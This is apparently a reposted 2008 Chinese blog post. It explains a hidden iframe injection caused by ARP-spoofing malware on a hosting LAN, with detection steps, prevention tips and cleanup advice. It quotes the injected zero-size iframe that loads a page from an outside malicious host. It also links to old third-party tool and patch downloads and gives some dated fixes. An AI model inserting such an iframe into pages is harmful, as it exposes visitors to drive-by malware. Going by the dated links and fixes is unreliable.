超級網迷

超級網迷+ 電腦迷+ 音樂迷
個人資料
正文

【轉貼】iframe攻擊的原理與對策

(2008-04-13 21:34:00) 下一個

iframe攻擊

Posted on 2008-04-08 18:18 by 停留的風

今天遇到一個問題,當打開網頁時,頁麵大多都偏離了原來的位置,像新浪、騰訊等大型網站一樣,首頁的整個頁麵都居左,這肯定是中招了,最後在網頁源代碼中發現了這樣一條代碼
<iframe src=http://a.158dm.com/one/arp.htm width=0 height=0 frameborder=0>iframe> 
而且這段代碼,在所有出現為題的網頁中都發現了。可見是真的中招。到網上查詢了相關的信息,好多都是通過替換將類似的代碼段進行替換,但是,在打開新的網頁的時候就會出現這種情況,顯然該方法不可取。
最後我的解決方案:清楚所有的臨時文件。
google上一搜,才知道中了iframe 病毒,是中ARP欺騙的病毒攻擊了。

那麽什麽是“ARP欺騙”呢?

首先,ARP的意思是Address Resolution Protocol(地址解析協議),它是一個位於TCP/IP協議棧中的低層協議,負責將某個IP地址解析成對應的MAC地址。

從影響網絡連接通暢的方式來看,ARP欺騙分為二種,一種是對路由器ARP表的欺騙;另一種是對內網PC的網關欺騙。

第一種ARP欺騙的原理是——截獲網關數據。它通知路由器一係列錯誤的內網MAC地址,並按照一定的頻率不斷進行,使真實的地址信息無法通過更新保存在路由器中,結果路由器的所有數據隻能發送給錯誤的MAC地址,造成正常PC無法收到信息。

第二種ARP欺騙的原理是——偽造網關。它的原理是建立假網關,讓被它欺騙的PC向假網關發數據,而不是通過正常的路由器途徑上網。在PC看來,就是上不了網了,“網絡掉線了”。

ARP欺騙木馬隻需成功感染一台電腦,就可能導致整個局域網都無法上網,嚴重的甚至可能帶來整個網絡的癱瘓。

而本次我的網站服務器所在的托管機房同一局域網中的某台服務器即被感染了ARP欺騙木馬,所以就影響了整個機房的其他服務器,於是服務器中成千上萬的虛擬主機網站就全部遭殃了,木馬種植者站點訪問量也是猛增,這還是小事,該木馬發作時除了會導致同一局域網內的其他用戶上網出現時斷時續的現象外,還會竊取用戶密碼。如盜取QQ密碼、盜取各種網絡遊戲密碼和賬號去做金錢交易,盜竊網上銀行賬號來做非法交易活動等,這是木馬的慣用伎倆,給用戶造成了很大的不便和巨大的經濟損失。

如何檢查本機是否中了ARP欺騙木馬病毒

“CTRL”+“ALT”+“DELETE”鍵打開“Windows任務管理器”窗口,查看有沒有“MIR0.dat”的進程,如果有,表示中毒了,需要立即“結束該進程”。

如何檢查局域網內感染ARP欺騙木馬病毒的計算機

“開始”菜單“運行”“cmd”打開MSDOS窗口,輸入“ipconfig”獲得“Default Gateway”默認網關。

繼續執行命令“arp -a”,查看默認網關IP對應的“Physical Address”值,在網絡正常時這就是網關的正確物理地址,在網絡受“ ARP 欺騙”木馬影響而不正常時,它就是木馬所在計算機的網卡物理地址。也可以掃描本子網內的全部IP地址,然後再查ARP表。如果有一個 IP 對應的物理地址與網關的相同,那麽這個IP地址和物理地址就是中毒計算機的IP地址和網卡物理地址。

如何防範計算機遭受ARP欺騙

1、不要把你的網絡安全信任關係建立在ip基礎上或mac基礎上,(rarp同樣存在欺騙的問題),理想的關係應該建立在ip+mac基礎上。
2、設置靜態的mac-->ip對應表,不要讓主機刷新你設定好的轉換表。
3、除非很有必要,否則停止使用ARP,將ARP做為永久條目保存在對應表中。
4、使用ARP服務器。通過該服務器查找自己的ARP轉換表來響應其他機器的ARP廣播。確保這台ARP服務器不被黑。
5、使用"proxy"代理ip的傳輸。
6、使用硬件屏蔽主機。設置好你的路由,確保ip地址能到達合法的路徑。(靜態配置路由ARP條目),注意,使用交換集線器和網橋無法阻止ARP欺騙。
7、管理員定期用響應的ip包中獲得一個rarp請求,然後檢查ARP響應的真實性。
8、管理員定期輪詢,檢查主機上的ARP緩存。
9、使用防火牆連續監控網絡。注意有使用SNMP的情況下,ARP的欺騙有可能導致陷阱包丟失。

推薦工具:欣向ARP工具,包括很全麵的ARP防範的功能。(其中包括WinPcap_3_0.,請務必先安裝此軟件)下載地址:
http://www.nuqx.com/downcenter.asp

ARP解決方法/工具+真假ARP防範區別方法+ARP終極解決方案
http://www.txwm.com/BBS384837.vhtml

ARP攻擊防範與解決方案專題
http://www.luxinjie.com/s/arp/


如何查殺

首先就是把補丁安裝上,
第一步,打補丁
補丁名字:這個漏洞在四月初就被發現了,趕緊補
windows的ANI漏洞被人利用來傳木馬,
有更新windows的安全更新
用卡巴能阻止其下載木馬
http://zhidao.baidu.com/question/23742350.html?si=1
趕緊下載補丁。
微軟官方鼠標漏洞發布ANI補丁(下載)
http://www.91kb.cn/read-htm-tid-1991.html

針對微軟的發的漏洞補丁的光標漏洞蠕蟲專殺工具
http://www.91kb.cn/read.php?tid=2468

艾尼光標漏洞。

第二步,殺毒:

1、先清除所有網頁臨時文件,方法,打開IE 工具,選項,刪除臨時文件夾中的所有脫機文件。

2、刪除    windows 目錄下的 logo_1.exe,刪除windowssystemieframe.dll,最後用升級到最新版的殺毒軟件全盤殺一次。

3、防範的辦法,如果是局域網內部的,肯定怎麽殺也殺不淨,其實不是你機子上的病毒了。你機子上的再怎麽查也查不到了。可是為什麽訪問網頁的時候還是首先會去 w3213.com呢?
  

第三步,以後上網養成用火狐瀏覽器上網,如果你不喜歡火狐,你查資料的時候一定要使用火狐,
不然人家有病毒,你也進,自著苦吃,火狐下載:
http://cn.91fox.cn

第四步,下載一個叫著 Antiarp的軟件,安裝。



[ 打印 ]
閱讀 ()評論 (0)
評論
目前還沒有任何評論
登錄後才可評論.